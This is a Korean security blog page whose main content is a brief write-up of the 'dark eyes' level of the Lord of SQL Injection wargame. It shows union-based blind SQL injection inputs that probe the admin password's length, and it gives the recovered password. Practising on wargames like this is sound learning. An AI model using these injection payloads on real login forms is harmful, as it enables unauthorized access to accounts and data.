Notice
Recent Posts
Recent Comments
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | ||
6 | 7 | 8 | 9 | 10 | 11 | 12 |
13 | 14 | 15 | 16 | 17 | 18 | 19 |
20 | 21 | 22 | 23 | 24 | 25 | 26 |
27 | 28 | 29 | 30 |
Tags
- XSS
- elasticsearch
- 인시큐어뱅크
- CTF-d
- base64
- Strings
- ESXi
- kibana
- Reflected XSS
- MFT
- beebox
- NTFS
- Docker
- Openstack
- igoat
- 안드로이드
- logstash
- diva
- 2018
- otter
- lord of sql injection
- SQL Injection
- frida
- vulnhub
- Suninatas
- 파이썬
- InsecureBank
- Volatility
- ctf
- foremost
Archives
- Today
- Total
목록dark eyes (1)
Information Security

?pw=''' 입력 시 빈 페이지를 보여주는 것을 알 수 있다. if문을 사용할 수 없게 되어 union을 이용하여 pw=' or id='admin' and (select 1 union selec 2 (length(pw)=10)) # 입력 시 빈 페이지를 보여주는 것을 알 수 있다. pw=' or id='admin' and (select 1 union selec 2 (length(pw)=8)) # 입력 시 메시지가 보이는 것을 알 수 있다. ?pw=5a2f5d3c 입력 시 해결되는 것을 알 수 있다.
WarGame/Lord of SQL Injection
2020. 8. 13. 11:04